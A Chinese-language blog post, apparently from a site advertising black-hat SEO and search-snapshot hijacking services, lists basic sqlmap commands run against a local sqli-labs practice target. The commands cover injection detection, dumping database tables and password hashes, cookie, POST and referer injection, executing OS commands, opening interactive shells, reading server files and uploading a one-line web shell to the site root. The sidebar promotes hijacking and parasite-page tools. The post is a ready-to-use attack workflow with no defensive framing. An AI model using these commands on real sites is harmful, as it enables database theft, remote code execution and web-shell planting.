富贵长生天做主由不得我
钢骨正气我做主由不得天
当前位置:网站快照劫持代码-快照删除-黑帽SEO > 参考文摘 > 正文

sqlmap基础指令

2022-07-23 分类:参考文摘 阅读(359) 评论(0)

判断是否存在注入

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1”

判断当前用户下所有数据库

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –dbs

获取数据库的表名

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql –tables

获取表中的字段名

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql -T user –dump

获取表中字段内容

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql -T user -C user,password –dump

列出所有管理员用户

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –users

获取数据库用户的密码

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –passwords

获取当前网站数据库名称

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –current-db

获取当前数据库的用户名称

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –current-user

当前用户是否为管理员权限

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –is-dba

判断文本中的请求是否存在注入

sqlmap.py -r request.txt –level 3

request文件中保存的是web数据包,Http请求。

指定页面的POST字段注入

sqlmap.py -u URL –data “uname=123&passwd=123&submit=Submit”

cookie值注入

sqlmap.py -u URL –cookie=”cookie值”

检测request.txt中cookie字段进行注入

qlmap.py -r request.txt –level 2

referfer值注入

sqlmap.py -u URL –referer=“referer值”

1.sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –is-dba
//判断目标数据库用户是否是管理员TRUE/FALSE

  1. sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –users
    //查看数据库用户
    sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –os-cmd=”whoami”
    //在DBA前提下,执行单条命令

3.sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –os-shell
//在DBA前提下,获取交互式的shell

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –sql-shell
//返回SQL的交互式shell

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –file-read=”D:\phpStudy\PHPTutorial\WWW\sqlilabs\Less-1\index2.php”
//读取下载目标站点的指定文件

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –file-write 本地一句话木马绝对路径 –file-dest 网站一句话木马绝对路径+名称.PHP //上传木马到目标网站绝对路径

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –roles

//查看 sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –threads 1 //设置线程数,默认为1

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –skip=”newid” //跳过参数检测

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –prefix “) –suffix # //
指定PAYLOAD的闭合和注释方式

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –banner //查询数据库的版本信息

sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –technique T
//缩写:BEUSTQ

赞(0)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《sqlmap基础指令》
文章链接:https://www.lolmm.cn/stwd/1116.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。
标签:

相关推荐

评论 抢沙发

评论前必须登录!

 

关于本站

QQ : 8801-5351
灰机:https://t.me/black0ri 
星期一—五:8:00–18:00
星期六—日:11:00–15:00
专注服务器,网站安全。黑帽SEO、黑帽优化、 网站快照劫持、修复、安全加固、快照删除。

SEO推荐

新一代站群系统 三天收录上万 做搜狗和360

非寄生虫,也不用劫持,这站群怎么都比寄生虫好,投入少,效果好

黑帽推荐

2023寄生虫

2023寄生虫 无限繁殖 多种繁殖方式、跨站无限轮链,自动转码 原价3000。限时7折,赠劫持代码

热门文章